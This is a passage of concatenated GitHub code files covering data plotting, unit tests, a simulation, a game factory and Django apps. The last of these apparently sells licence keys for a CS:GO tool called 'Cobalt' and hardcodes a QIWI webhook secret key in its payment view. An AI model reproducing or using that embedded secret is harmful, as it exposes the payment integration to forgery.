streamlit as st\nimport plotly.express as px\nimport sqlite3\n\nst.title(\"Temperature of the World!\")\nresponse=sqlite3.connect(\"datb.db\")\ncursor = response.cursor()\ncursor.execute(\"SELECT * FROM temps\")\ncol1 = cursor.fetchall()\n\ndte=[]\ntmp=[]\nfor i in col1:\n dte.append(i[0])\n tmp.append(i[1])\n\nfigure= px.line(x=dte, y=tmp, labels={'x':'Date', 'y':'temperature in Celsius'})\nst.plotly_chart(figure)","repo_name":"RC2110/Web-Scraper","sub_path":"plotwebscrape.py","file_name":"plotwebscrape.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"7129849888","text":"import base64\nimport 
importlib\nimport io\nimport os\nimport sys\nfrom zipfile import ZipFile\n\nimport requests\n\nfrom .pipeline import Pipeline\n\n\ndef import_pipeline(pipeline_dir_path: str):\n pipeline_dir = os.path.abspath(pipeline_dir_path)\n sys.path.append(pipeline_dir)\n pipeline_package = importlib.import_module(\"pipeline\")\n\n pipeline = next(v for _, v in pipeline_package.__dict__.items() if v and type(v) == Pipeline)\n return pipeline\n\n\ndef download_pipeline(url: str, token: str, run_id: str, target_dir):\n r = requests.post(\n url + \"/graphql/\",\n headers={\"Authorization\": f\"Bearer {token}\"},\n json={\n \"query\": \"\"\"\n query PipelineDownload($id: UUID!) {\n pipelineRun(id: $id) {\n id\n version {\n number\n }\n code\n }\n }\n \"\"\",\n \"variables\": {\"id\": run_id},\n },\n timeout=30,\n )\n r.raise_for_status()\n data = r.json()\n zipfile = base64.b64decode(data[\"data\"][\"pipelineRun\"][\"code\"].encode(\"ascii\"))\n source_dir = os.getcwd()\n os.chdir(target_dir)\n with ZipFile(io.BytesIO(zipfile)) as zf:\n zf.extractall()\n os.chdir(source_dir)\n","repo_name":"BLSQ/openhexa-sdk-python","sub_path":"openhexa/sdk/pipelines/runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"14793000760","text":"\"\"\"Test SurveyLink entities and their interaction with cloud storage.\"\"\"\n\nimport cloudstorage as gcs\nimport logging\nimport random\nimport string\n\nfrom unit_test_helper import ConsistencyTestCase\nfrom model import SurveyLink\n\n\ndef generate_csv_content(num_links):\n \"\"\"Mock the contents of a Qualtrics unique link csv file.\n\n Args:\n num_links: int how many rows other than the header to generate\n\n Returns:\n a tuple with\n * the file contents as a string\n * a list of the unique link urls, in the same order as the csv rows\n \"\"\"\n csv_rows = [\n '\"Response ID\",\"Last Name\",\"First Name\",\"External Data Reference\",\"Email\",\"Status\",\"End Date\",\"Link\",\"Link Expiration\"'\n ]\n # Based on unique link csv export as of 2017-02-21.\n link_row_template = (\n '\"\",\"\",\"\",\"\",\"{rnd_str}@{rnd_str}.com\",\"Email Not Sent Yet\",\"\",'\n '\"{url}\",\"2050-02-16 16:10:00\"'\n )\n url_template = (\n 'https://sshs.qualtrics.com/SE?'\n 'Q_DL={rnd_str}_{rnd_str}_MLRP_{rnd_str}&Q_CHL=gl'\n )\n urls = []\n for x in range(num_links):\n rnd_str = ''.join(random.choice(string.ascii_lowercase)\n for x in range(10))\n url = url_template.format(rnd_str=rnd_str)\n row_str = link_row_template.format(rnd_str=rnd_str, url=url)\n csv_rows.append(row_str)\n urls.append(url)\n content = \"\\n\".join(csv_rows)\n return (content, urls)\n\n\nclass TestSurveyLinksInconsistent(ConsistencyTestCase):\n \"\"\"Survey link queries behave correctly under eventual consistency.\"\"\"\n\n consistency_probability = 0\n\n def set_up(self):\n # Let ConsistencyTestCase set up the datastore testing stub.\n super(TestSurveyLinksInconsistent, self).set_up()\n\n # Needed for gcs interaction.\n self.testbed.init_app_identity_stub()\n self.testbed.init_urlfetch_stub()\n self.testbed.init_blobstore_stub()\n\n def test_create_links(self):\n \"\"\"Can import a csv from cloud storage.\"\"\"\n program_label = 'demo-program'\n content, urls = generate_csv_content(101)\n path = SurveyLink.import_path(program_label, 1, 'links.csv')\n with gcs.open(path, 'w') as fh:\n # Choose 101 to prove that we can 1) do more than a single batch of\n # 100 and 2) do a partial batch (the 
last one).\n fh.write(content)\n num_imported = SurveyLink.import_links(program_label, 1, 'links.csv')\n\n self.assertEqual(num_imported, 101)\n\n gcs.delete(path)\n\n def test_get_unique(self):\n \"\"\"Impossible for the same link to be assigned twice.\"\"\"\n kwargs = {'program_label': 'demo-program', 'survey_ordinal': 1}\n link1 = SurveyLink(id='foo', **kwargs)\n link2 = SurveyLink(id='bar', **kwargs)\n link1.put()\n link2.put()\n\n # Get each to sync up the datastore.\n link1.key.get()\n link2.key.get()\n\n # Delete one to try to trick the datastore.\n link1.key.delete()\n\n # Getting one should return 'bar' (but maybe not find any?).\n linkA_fetched = SurveyLink.get_unique('demo-program', 1)\n logging.info(linkA_fetched)\n self.assertNotEqual(linkA_fetched.url, link1.url)\n\n # Getting a second should definitely return None.\n linkB_fetched = SurveyLink.get_unique('demo-program', 1)\n logging.info(linkB_fetched)\n self.assertIsNone(linkB_fetched)\n\n def test_scoping(self):\n \"\"\"Links for different sessions and programs shouldn't cross.\"\"\"\n link1 = SurveyLink(id='foo1', program_label='foo', survey_ordinal=1)\n link2 = SurveyLink(id='foo2', program_label='foo', survey_ordinal=2)\n link3 = SurveyLink(id='bar1', program_label='bar', survey_ordinal=1)\n link1.put()\n link2.put()\n link3.put()\n\n # Get each to sync up the datastore.\n link1.key.get()\n link2.key.get()\n link3.key.get()\n\n self.assertEqual(SurveyLink.get_unique('foo', 1).url, link1.url)\n self.assertEqual(SurveyLink.get_unique('foo', 2).url, link2.url)\n self.assertEqual(SurveyLink.get_unique('bar', 1).url, link3.url)\n\n\nclass TestSurveyLinksConsistent(ConsistencyTestCase):\n \"\"\"Survey link queries don't show duplicates.\"\"\"\n\n # To know that there are no duplicate SurveyLink entities in the datastore,\n # we need to list all of them. 
The only way to do that is with a\n    # consistent stub.\n    consistency_probability = 1\n\n    def set_up(self):\n        # Let ConsistencyTestCase set up the datastore testing stub.\n        super(TestSurveyLinksConsistent, self).set_up()\n\n        # Needed for gcs interaction.\n        self.testbed.init_app_identity_stub()\n        self.testbed.init_urlfetch_stub()\n        self.testbed.init_blobstore_stub()\n\n    def test_duplicate_links_overwrite(self):\n        \"\"\"Importing links should be idempotent.\"\"\"\n        program_label = 'demo-program'\n        content, urls = generate_csv_content(101)\n        path = SurveyLink.import_path(program_label, 1, 'links.csv')\n        with gcs.open(path, 'w') as fh:\n            fh.write(content)\n\n        # Import the same csv twice.\n        SurveyLink.import_links(program_label, 1, 'links.csv')\n        SurveyLink.import_links(program_label, 1, 'links.csv')\n\n        # Still only 101.\n        keys = [k for k in SurveyLink.query().iter(keys_only=True)]\n        self.assertEqual(len(keys), 101)\n\n        gcs.delete(path)\n","repo_name":"Stanford-PERTS/neptune","sub_path":"unit_testing/test_survey_links.py","file_name":"test_survey_links.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21435786367","text":"import simpy\nKd = 10 # 10 D2D device pairs\ntime_downlink = 10 # downlink transmission time\ntime_dedicated = 10 # cellular users' dedicated transmission time\ntime_D2D = 1 # D2D transmission time\na = [0] * (Kd + 2)\na[0] = time_downlink\nfor i in range(1, Kd + 1):\n    a[i] = time_D2D\na[Kd + 1] = time_dedicated\n\ndef EH(env):\n    while True:\n        print('%7.4f : BS starts transmitting to CUs while DUs harvest energy' % env.now)\n        yield env.timeout(a[0])\n        print('%7.4f : downlink ends; D2D communication begins' % env.now)\n        for i in range(1, Kd + 1):\n            print('%7.4f : D2D%02d starts communicating' % (env.now, i))\n            yield env.timeout(a[i])\n            print('%7.4f : D2D%02d stops communicating' % (env.now, i))\n        print('%7.4f : DUs shut down; CUs communicate alone' % env.now)\n        yield env.timeout(a[Kd + 1])\n        print('%7.4f : uplink ends; CUs stop communicating' % env.now)\n\n# start the simulation\nenv = simpy.Environment() # instantiate the environment\nenv.process(EH(env)) # register the EH process\nenv.run(until=100) # set the stop condition: end after 100 seconds\n\n","repo_name":"hustfc/OJ","sub_path":"PYTHON/EH模块仿真.py","file_name":"EH模块仿真.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"24142644519","text":"import os\n\nfrom PIL import ImageDraw, ImageFont\n\n\ndef draw(predictions, image, image_name):\n    draw_image = ImageDraw.Draw(image, \"RGBA\")\n\n    image_width, image_height = image.size\n\n    font = ImageFont.truetype(\"counter/resources/arial.ttf\", 20)\n    i = 0\n    for prediction in predictions:\n        box = prediction.box\n        draw_image.rectangle(\n            [(box.xmin * image_width, box.ymin * image_height),\n             (box.xmax * image_width, box.ymax * image_height)],\n            outline='red')\n        class_name = prediction.class_name\n        draw_image.text(\n            (box.xmin * image_width, box.ymin * image_height - font.getsize(class_name)[1]),\n            f\"{class_name}: {prediction.score}\", font=font, fill='black')\n        i += 1\n    try:\n        os.mkdir('tmp/debug')\n    except OSError:\n        pass\n    image.save(f\"tmp/debug/{image_name}\", \"JPEG\")\n","repo_name":"efrnlsn/object-counter","sub_path":"counter/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"71704696912","text":"#https://codeforces.com/contest/703/problem/A\n\nn = int(input())\nmwins, cwins = 0, 0\nfor i in range(n):\n    m, c = map(int, input().split())\n    if m > c:\n        mwins += 1\n    elif m < c:\n        cwins += 1\nif mwins == cwins:\n    print(\"Friendship is 
magic!^^\")\nelse:\n print(\"Mishka\" if mwins > cwins else \"Chris\")","repo_name":"ByMykel/Codeforces","sub_path":"Python/0703A-MishkaandGame.py","file_name":"0703A-MishkaandGame.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"70922071312","text":"import random\nfrom typing import List\n\nfrom src.core.elements import Elements\nfrom src.data.resources import ElementalResource, AttributeResource\nfrom src.elemental.attribute.attribute_factory import AttributeFactory\nfrom src.elemental.elemental import Elemental\nfrom src.elemental.species.felix import Felix\nfrom src.elemental.species.mithus import Mithus\nfrom src.elemental.species.nepharus import Nepharus\nfrom src.elemental.species.noel import Noel\nfrom src.elemental.species.npc_monsters.manapher import Manapher\nfrom src.elemental.species.npc_monsters.tophu import Tophu\nfrom src.elemental.species.rainatu import Rainatu\nfrom src.elemental.species.rex import Rex\nfrom src.elemental.species.roaus import Roaus\nfrom src.elemental.species.sithel import Sithel\nfrom src.elemental.species.slyfe import Slyfe\n\n\nclass ElementalInitializer:\n \"\"\"\n Factory methods for creating specific Elementals.\n \"\"\"\n\n SUMMONABLE_SPECIES = [Mithus(),\n Roaus(),\n Rainatu(),\n Sithel(),\n Felix(),\n Nepharus(),\n Slyfe(),\n Noel(),\n Rex()]\n\n ALL_SPECIES = SUMMONABLE_SPECIES + [\n Manapher(),\n Tophu()\n ]\n\n NAME_MAP = {}\n for species in ALL_SPECIES:\n NAME_MAP[species.name] = species\n\n @staticmethod\n def make(species, level=1) -> Elemental:\n \"\"\"\n :param species: Which subclass of Species\n :param level: How much to level up the Elemental\n \"\"\"\n elemental = Elemental(species,\n AttributeFactory.create_random())\n elemental.level_to(level)\n return elemental\n\n @staticmethod\n def from_server(resource: ElementalResource) -> Elemental:\n species_name = resource.species\n species = ElementalInitializer.NAME_MAP[species_name]\n attributes = [AttributeResource(**attribute) for attribute in resource.attributes]\n elemental = Elemental(species,\n AttributeFactory.create_from_resources(attributes),\n id=resource.id)\n elemental.load_from_resource(resource)\n return elemental\n\n @staticmethod\n def make_random(level=1, excluding: List[Elemental] = None, element: Elements = None) -> Elemental:\n \"\"\"\n :param level: The desired level of the Elemental.\n :param excluding: A List[Species] of elementals to exclude.\n :param element: Filter elementals by a specific element.\n :return: The summoned elemental.\n \"\"\"\n summonable_species = list(ElementalInitializer.SUMMONABLE_SPECIES)\n if element:\n summonable_species = [species for species in summonable_species if species.element == element]\n potential_species = None\n if excluding:\n excluded_species = [elemental.species.name for elemental in excluding]\n potential_species = [species for species in summonable_species\n if species.name not in excluded_species]\n if not potential_species or not excluding:\n potential_species = summonable_species\n pick = random.randint(0, len(potential_species) - 1)\n return ElementalInitializer.make(potential_species[pick], level)\n\n\ndef print_abilities():\n for species in ElementalInitializer.SUMMONABLE_SPECIES:\n print(species.name)\n for learnable in species.learnable_abilities:\n print(f\"Lv. 
{learnable.level_required} {learnable.name} \"\n f\"[{learnable.element} {learnable.category}]\\n\"\n f\"Mana cost: {learnable.mana_cost} Power: {learnable.attack_power}\\n\"\n f\"{learnable.description}\\n\")\n print('\\n')\n\n# print_abilities()\n","repo_name":"Hammerlord/Monbot","sub_path":"src/elemental/elemental_factory.py","file_name":"elemental_factory.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"42465157195","text":"from util import *\n\n\n\n\n@apply\ndef apply(given):\n A, B = given.of(Unequal)\n if B:\n assert not A\n A = B\n x = A.element_symbol()\n return Any[x](Element(x, A))\n\n\n@prove\ndef prove(Eq):\n from axiom import sets\n\n A = Symbol(etype=dtype.integer, given=True)\n Eq << apply(Unequal(A, A.etype.emptySet))\n\n Eq << sets.any_el.imply.ne_empty.apply(Eq[1])\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n run()\n# created on 2021-06-05\n","repo_name":"cosmosZhou/axiom","sub_path":"axiom/sets/ne_empty/given/any_el.py","file_name":"any_el.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"11796093278","text":"from django.urls import path, include\nfrom django.contrib.auth import views as auth_views\nfrom . import views\n\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('', include('django.contrib.auth.urls')),\n path('register/', views.register, name='register'),\n path('edit/', views.edit, name='edit'),\n path('/', views.user_detail, name='user_detail'),\n path('users/follow/', views.user_follow, name='user_follow'),\n\n]\n","repo_name":"ziyad00/curiouscat","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12362117704","text":"import sys\nsys.stdin = open('1861in.txt','r')\n\ndef iswall(Y,X):\n if Y<0 or X<0 or Y>= N or X>=N:\n return True\n return False\n\ndef Miro(Y,X):\n global count\n dy = [0,0,-1,1]\n dx = [-1,1,0,0]\n for i in range(4):\n C_Y = Y+dy[i]\n C_X = X+dx[i]\n if (iswall(C_Y,C_X) == False) and (List[C_Y][C_X] - List[Y][X] ==1):\n count += 1\n Miro(C_Y, C_X)\n\nT = int(input())\nfor Count in range(T):\n print(\"#{} \".format(Count+1),end='')\n N = int(input())\n List = [list(map(int,input().split())) for _ in range(N)]\n Max_Count = 0\n Answer = []\n for Y in range(N):\n for X in range(N):\n count = 1\n Miro(Y,X)\n if Max_Count < count:\n Max_Count = count\n Answer= [List[Y][X]]\n if Max_Count == count:\n Max_Count = count\n Answer.append(List[Y][X])\n print(min(Answer),end=' ')\n print( Max_Count)","repo_name":"Jihyeok11/Algorithm","sub_path":"Python/SWExpert/모의평가/1861(정사각형방).py","file_name":"1861(정사각형방).py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41567081935","text":"import unittest\nimport subprocess\nimport os\nimport shutil\n\nAUTO_GIT_SYNC_ENV_KEY = \"AUTO_GIT_SYNC_BRANCH\"\nIS_UPDATED_SH = \"/isUpdated.sh\"\nBIN_PATH = \"/tests/bin\"\nEXAMPLE_ENV_VAR = \"asoneuths\"\n\nTEST_DIR_PATH = '/tmp/test_dir'\n\nclass TestGitCheck(unittest.TestCase):\n\n def setUp(self):\n os.environ[AUTO_GIT_SYNC_ENV_KEY] = EXAMPLE_ENV_VAR\n self.original_path = os.environ[\"PATH\"]\n self.original_cwd = os.getcwd()\n self.cmd = [os.getcwd() + IS_UPDATED_SH]\n 
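# Work in a throwaway scratch directory: clear any leftover from an earlier\n        # run (ignore_errors covers the very first run) before recreating it below.\n        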
shutil.rmtree(TEST_DIR_PATH, ignore_errors=True)\n        os.mkdir(TEST_DIR_PATH)\n\n    def tearDown(self):\n        os.environ[\"PATH\"] = self.original_path\n        os.chdir(self.original_cwd)\n        shutil.rmtree(TEST_DIR_PATH, ignore_errors=True)\n\n    def exec(self, cmd=None):\n        if cmd is None:\n            cmd = self.cmd\n        process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        out, err = process.communicate()\n        return out.decode('utf-8').rstrip('\\n'), err.decode('utf-8').rstrip('\\n')\n\n    def test_without_git(self):\n        os.environ[\"PATH\"] = os.getcwd() + BIN_PATH\n        out, err = self.exec()\n        self.assertEqual(err, \"git command not found\")\n        self.assertEqual(out, \"\")\n\n    def test_no_repo(self):\n        os.chdir(TEST_DIR_PATH)\n        out, err = self.exec()\n        self.assertEqual(err, \"git repo not found\")\n        self.assertEqual(out, \"\")\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"pidement/auto-git-sync","sub_path":"tests/unit/test_git_check.py","file_name":"test_git_check.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"}
{"seq_id":"33561128071","text":"from datetime import date\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n    path('apt_requests/', views.AppointsRequestsView.as_view(), name='apt_requests'),\n    path('pending_apts/', views.PendingAppointsView.as_view(), name='pending_apts'),\n    path('update_apt//', views.AppointmentUpdateView.as_view(), name='update_apt'),\n    path('update_apt_res//', views.AppointmentResponseUpdateView.as_view(), name='update_apt_res'),\n    path('apt_status///', views.update_appointment_status, name='apt_status'),\n    path('apt_status_res///', views.update_appointment_response_status, name='apt_status_res'),\n    path('appointment_response//', views.AppointmentResponseView.as_view(), name='appointment_response'),\n    path('all_users/', views.AllUsersList.as_view(), name='all_users'),\n    path('calendar/', views.CalendarView.as_view(), name='calendar'),\n    path('delete_appointment/', views.delete_appointment, name='delete_appointment'),\n    path('delete_appointment_response/', views.delete_appointment_response, name='delete_appointment_response'),\n    path('create_appoint/', views.TherapistCreateAppointmentView.as_view(), name='create_appoint'),\n    path('disable_day//', views.disable_day, name='disable_day'),\n    path('enable_day//', views.enable_day, name='enable_day'),\n    path('disable_date/', views.DisableDatesView.as_view(), name='disable_dates'),\n    path('enable_date//', views.enable_date, name='enable_date'),\n    path('working_time/', views.WorkingTimeView.as_view(), name='working_time'),\n    path('preferences/', views.PreferencesView.as_view(), name='preferences'),\n    path('appoint_list/', views.AppointsView.as_view(), name='appoint_list'),\n    path('create_comment/', views.CreateCommentView.as_view(), name='create_comment'),\n    path('edit_comment//', views.EditCommentView.as_view(), name='edit_comment'),\n    path('delete_comment//', views.delete_comment, name='delete_comment'),\n    path('send_contact_email/', views.CreateContactMessageToPatient.as_view(), name='send_contact_email'),\n]","repo_name":"idosarue/appointments","sub_path":"appointments/therapist/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"35003325839","text":"# coding=UTF-8\n# Build the vocabulary\n\n'''\n@File: get_vocab\n@Author: WeiWei\n@Time: 2023/4/2\n@Email: 
weiwei_519@outlook.com\n@Software: PyCharm\n'''\n\nimport json\n\n\ndef get_dict(datas):\n word_count = {}\n for data in datas:\n data = data.strip().replace('\\t', '')\n for word in data:\n word_count.setdefault(word, 0)\n word_count[word] += 1\n word2id = {\"\": 0, \"\": 1, \"\": 2}\n\n temp = {word: i + len(word2id) for i, word in enumerate(word_count.keys())}\n word2id.update(temp)\n id2word = list(word2id.keys())\n return word2id, id2word\n\n\nif __name__ == '__main__':\n with open('dataset.txt', 'r', encoding='utf-8') as f:\n datas = f.readlines()\n word2id, id2word = get_dict(datas)\n\n dict_datas = {\"word2id\": word2id, \"id2word\": id2word}\n\n json.dump(dict_datas, open('dict_datas.json', 'w', encoding='utf-8'))\n","repo_name":"weiwei0519/chatbot","sub_path":"chatbot_with_gpt/get_vocab.py","file_name":"get_vocab.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"43655541531","text":"import json\nimport xml.etree.ElementTree as ET\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Keys, ForumTopic, Posts, Pays\nfrom datetime import datetime, date, timedelta\nfrom django.shortcuts import redirect\nimport django.http\nimport requests\nimport json\nfrom django.contrib.auth.models import User\nimport base64\nimport hmac\nimport hashlib\nfrom django.views.decorators.csrf import csrf_exempt\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport os, binascii\nimport secrets\n\n\ndef MainCSGO(request):\n return render(request, '../templates/csgo/main.html')\n\n\ndef Cobalt(request):\n return render(request, '../templates/csgo/cobalt.html')\n\n\ndef CobaltSuc(request):\n return render(request, '../templates/csgo/success.html')\n\ndef CobaltPayR30(request):\n if request.method == \"GET\":\n if request.user.is_authenticated:\n try:\n user_email = User.objects.get(username=request.user.username).email\n pay = Pays(email=user_email, length=30)\n pay.save()\n\n url = \"https://oplata.qiwi.com/create?publicKey=48e7qUxn9T7RyYE1MVZswX1FRSbE6iyCj2gCRwwF3Dnh5XrasNTx3BGPiMsyXQFNKQhvukniQG8RTVhYm3iPv7WmE6m9JsDkeLFCqcrGikz3z7eJ5AoBQnUvVTzsPNsYi7AqCa2DgRXY5vvPsZSVkTQZAbDFwLf4k8XdmdJuogWjXKx8GkQuEPuz5sYoR&\" \\\n \"&amount=99\" \\\n \"&billId=\" + str(pay.id) + \"\" \\\n \"&comment=\" + str(pay.id) + \"\" \\\n \"&successUrl=https%3A%2F%2Fmodernface.space%2Fcsgo%2Fcobalt%2Fpay%2Fsuccess\" \\\n \"&customFields%5BthemeCode%5D=Danyyl-EJa2htk5pl\" \\\n \"&email=\" + str(user_email.replace(\"@\", \"%40\"))\n\n context = {\"url\": url}\n\n return render(request, '../templates/csgo/pay.html', context)\n except:\n raise django.http.Http404\n else:\n return redirect('/accounts/login/')\n\n\ndef CobaltPayR90(request):\n if request.method == \"GET\":\n if request.user.is_authenticated:\n try:\n user_email = User.objects.get(username=request.user.username).email\n pay = Pays(email=user_email, length=90)\n pay.save()\n\n url = \"https://oplata.qiwi.com/create?publicKey=48e7qUxn9T7RyYE1MVZswX1FRSbE6iyCj2gCRwwF3Dnh5XrasNTx3BGPiMsyXQFNKQhvukniQG8RTVhYm3iPv7WmE6m9JsDkeLFCqcrGikz3z7eJ5AoBQnUvVTzsPNsYi7AqCa2DgRXY5vvPsZSVkTQZAbDFwLf4k8XdmdJuogWjXKx8GkQuEPuz5sYoR&\" \\\n \"&amount=249\" \\\n \"&billId=\" + str(pay.id) + \"\" \\\n \"&comment=\" + str(pay.id) + \"\" \\\n \"&successUrl=https%3A%2F%2Fmodernface.space%2Fcsgo%2Fcobalt%2Fpay%2Fsuccess\" \\\n \"&customFields%5BthemeCode%5D=Danyyl-EJa2htk5pl\" \\\n \"&email=\" + 
str(user_email.replace(\"@\", \"%40\"))\n\n context = {\"url\": url}\n\n return render(request, '../templates/csgo/pay.html', context)\n except:\n raise django.http.Http404\n else:\n return redirect('/accounts/login/')\n\n\n@csrf_exempt\ndef PayHook(request):\n raise Exception\n\n if request.method == \"POST\":\n hook_data = json.loads(request.body.decode('utf-8'))\n\n webhook_key_base64 = 'sxh0H+e1TOMts2qh0HO6S4bnvs5u4cbuIl2Sep9vPns='\n webhook_key = base64.b64decode(bytes(webhook_key_base64, 'utf-8'))\n data = str(hook_data[\"payment\"][\"sum\"][\"currency\"]) + \"|\" + str(hook_data[\"payment\"][\"sum\"][\"amount\"]) + \"|\" + str(hook_data[\"payment\"][\"type\"]) + \"|\" + str(hook_data[\"payment\"][\"account\"]) + \"|\" + str(hook_data[\"payment\"][\"txnId\"])\n\n if hmac.new(webhook_key, data.encode('utf-8'), hashlib.sha256).hexdigest() == hook_data[\"hash\"]:\n email = Pays.objects.get(id=hook_data[\"payment\"][\"comment\"]).email\n length = Pays.objects.get(id=hook_data[\"payment\"][\"comment\"]).length\n\n print(email)\n\n key_number = str(secrets.token_hex(2)) + \"-\" + str(secrets.token_hex(2)) + \"-\" + str(secrets.token_hex(2)) + \"-\" + str(secrets.token_hex(2))\n new_key = Keys(username=User.objects.get(email__exact=email).username, key=key_number, number_of_months=int(length))\n new_key.save()\n\n print(new_key.key)\n\n fromaddr = \"\"\n toaddr = email\n mypass = \"\"\n\n msg = MIMEMultipart()\n msg['From'] = fromaddr\n msg['To'] = toaddr\n msg['Subject'] = \"COBALT\"\n\n body = \"Thank you! Your key: \" + key_number + \". Download link: https://modernface.space/downloads/cobalt_updater.exe\"\n msg.attach(MIMEText(body, 'plain'))\n\n server = smtplib.SMTP('smtp.outlook.com')\n server.starttls()\n server.login(fromaddr, mypass)\n text = msg.as_string()\n server.sendmail(fromaddr, toaddr, text)\n server.quit()\n\n return redirect('/')\n else:\n raise django.http.Http404\n else:\n raise django.http.Http404\n\n\n\ndef CheckKey(request):\n if request.method == \"GET\":\n key = str(request.GET['key'])\n username = str(request.GET['username'])\n try:\n row = Keys.objects.get(key=key)\n\n correct_username = str(row.username)\n\n if username == correct_username:\n try:\n request.GET['activate']\n if row.activated == False:\n start_date = date(row.start_date.year, row.start_date.month, row.start_date.day)\n day_delta = (date.today() - start_date).days\n\n print(day_delta)\n\n if day_delta <= int(row.number_of_months):\n row.activated = True\n row.save()\n return HttpResponse('true')\n else:\n return HttpResponse('false')\n else:\n return HttpResponse('false')\n except:\n start_date = date(row.start_date.year, row.start_date.month, row.start_date.day)\n day_delta = (date.today() - start_date).days\n\n print(day_delta)\n\n if day_delta <= int(row.number_of_months):\n return HttpResponse('true')\n else:\n return HttpResponse('false')\n else:\n return HttpResponse('false')\n except:\n return HttpResponse('false')\n\n\ndef ForumMain(request):\n if request.method == \"GET\":\n context = {\"popular_topics\": [], \"last_topics\": []}\n\n counter = 0\n for i in ForumTopic.objects.order_by('-views'):\n if len(i.description) <= 200:\n context['popular_topics'].append({\"id\": i.id, \"name\": i.name, \"description\": i.description, \"views\": str(i.views), \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[:4], \"number_of_posts\": str(i.number_of_posts)})\n else:\n context['popular_topics'].append({\"id\": i.id, \"name\": i.name, 
\"description\": i.description[:201] + '...', \"views\": str(i.views), \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[:4], \"number_of_posts\": str(i.number_of_posts)})\n\n counter += 1\n if counter >= 5:\n break\n\n counter = 0\n for i in ForumTopic.objects.order_by('-id'):\n if len(i.description) <= 120:\n context['last_topics'].append({\"id\": i.id, \"name\": i.name, \"description\": i.description, \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[:4], \"number_of_posts\": str(i.number_of_posts)})\n else:\n context['last_topics'].append({\"id\": i.id, \"name\": i.name, \"description\": i.description[:201] + '...', \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[:4], \"number_of_posts\": str(i.number_of_posts)})\n\n counter += 1\n if counter >= 7:\n break\n\n counter = 0\n counter_id = 0\n themes_list = []\n for i in ForumTopic.objects.order_by('?'):\n try:\n while True:\n item = ForumTopic.objects.order_by('?')[counter_id]\n if item.subject not in themes_list:\n themes_list.append(item.subject)\n counter_id += 1\n break\n else:\n counter_id += 1\n except IndexError:\n pass\n\n counter += 1\n if counter >= 7:\n break\n\n context['themes'] = themes_list\n\n return render(request, '../templates/csgo/forum/main_forum.html', context)\n elif request.method == \"POST\":\n text = request.POST.get(\"search_topic\")\n\n return redirect('/csgo/forum/search_topic/?search=' + text)\n\n\ndef Topic(request):\n if request.method == \"GET\":\n try:\n topic_id = str(request.GET['topic_id'])\n topic_name = ForumTopic.objects.get(id=topic_id).name[:20]\n topic_name_full = ForumTopic.objects.get(id=topic_id).name\n topic_date = ForumTopic.objects.get(id=topic_id).creation_date\n topic_subject = ForumTopic.objects.get(id=topic_id).subject\n topic_description = ForumTopic.objects.get(id=topic_id).description\n topic_author = ForumTopic.objects.get(id=topic_id).author\n\n is_super_topic = ForumTopic.objects.get(id=topic_id).is_super_topic\n\n posts = Posts.objects.filter(topic_id=int(topic_id)).order_by(\"creation_datetime\")\n numbers_of_posts = Posts.objects.filter(topic_id=topic_id).count()\n list_of_posts = []\n\n\n for i in posts:\n post = {}\n post[\"author\"] = i.author\n post['datetime'] = i.creation_datetime\n post['text'] = i.text\n list_of_posts.append(post)\n\n\n context = {\"topic_id\": topic_id, \"topic_name\": topic_name, \"topic_name_full\": topic_name_full, \"topic_date\": topic_date, \"topic_subject\": topic_subject,\n \"topic_description\": topic_description, \"topic_author\": topic_author, \"posts\": list_of_posts, \"is_super_topic\": is_super_topic}\n\n\n topic_state = ForumTopic.objects.get(id=topic_id)\n topic_state.views += 1\n topic_state.number_of_posts = numbers_of_posts\n topic_state.save()\n\n return render(request, '../templates/csgo/forum/topic.html', context)\n except:\n raise django.http.Http404\n\n\ndef 